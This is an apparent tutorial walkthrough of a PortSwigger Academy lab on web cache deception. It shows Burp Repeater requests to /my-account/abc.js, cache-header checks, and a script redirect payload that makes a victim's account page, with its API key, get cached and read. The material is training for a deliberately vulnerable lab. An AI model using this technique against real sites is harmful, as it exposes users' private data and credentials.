Lab: Exploiting path mapping for web cache deception

Identify a target endpoint

After starting the exercise, the blog should look like the screenshot. We click on the link “My account” and log in with the user name wiener and the password peter.

After entering the data, click on the “Log In” button.

After successfully logging in, we will see our API key.

Identify a path mapping discrepancy

We now switch to the Burp Proxy and open the “HTTP history” tab there. In the “HTTP history”, search for the request GET /my-account and send it to Burp Repeater.

To send the request to Burp Repeater, we move the mouse over the request and press the right mouse button. A context menu appears in which we select the option “Send to Repeater”.

We now switch to the Burp Repeater and insert any character string in the first line. The request could look like this.

GET /my-account/abc HTTP/2
Host: 0a5900c80475e20de1d5ee43008f0047.web-security-academy.net
Cookie: session=QiIwBFLdpoAB2n0T8npy7iFMsv5GLAz8
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a5900c80475e20de1d5ee43008f0047.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

We now send this request to the application and see in the response that our API key still exists there. This means that the origin server abstracts the URL path to /my-account.

Now we add a static file extension to our character string. To do this, we use the extension .js for JavaScript files. The request could look like this.

GET /my-account/abc.js HTTP/2
Host: 0a5900c80475e20de1d5ee43008f0047.web-security-academy.net
Cookie: session=QiIwBFLdpoAB2n0T8npy7iFMsv5GLAz8
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a5900c80475e20de1d5ee43008f0047.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Now we send the request to the application and observe that the response contains the header X-Cache: miss and the header Cache-Control: max-age=30. The X-Cache: miss header indicates that this response was not served from the cache. The Cache-Control: max-age=30 header suggests that the response, if cached, should be stored for 30 seconds.

If we now send this request to the application again within 30 seconds after the first transmission, the value of the header changes to X-Cache: hit.

This shows that it was provided from the cache. From this we can conclude that the cache interprets the URL path as /my-account/abc.js and has a cache rule based on the static extension .js. We can use this payload for an exploit.

Craft an exploit

We now switch to the exploit server. To do this, we click on the “Go to exploit server” button in the browser.

In the Exploit Server, we add an exploit in the “Body” section that redirects the user carlos to our URL that we created above.

Der Exploit sieht wie folgt aus.

<script>document.location="https://0a5900c80475e20de1d5ee43008f0047.web-security-academy.net/my-account/abc.js"</script>

The address must be adapted to yours. The document.location is a location object in JavaScript to which the address of our exercise environment is assigned. You can find more information at Mozilla Dev. By clicking on the “Deliver exploit to victim” button, we make the exploit available to our victim. When the victim calls the exploit, the response it receives is saved in the cache.

After we have provided the exploit to our victim, we now take the address from the exploit https://0a5900c80475e20de1d5ee43008f0047.web-security-academy.net/my-account/abc.js and paste it into a new tab in our browser. We now see the account of carlos.

We now copy the API key and click on the “Submit solution” button.

In the window that appears, we insert the API key of carlos.

After confirming the entry by clicking on “Ok”, we have completed the exercise.

Video solution

PreviousWeb Cache DeceptionNextLab: Exploiting path delimiters for web cache deception

Last updated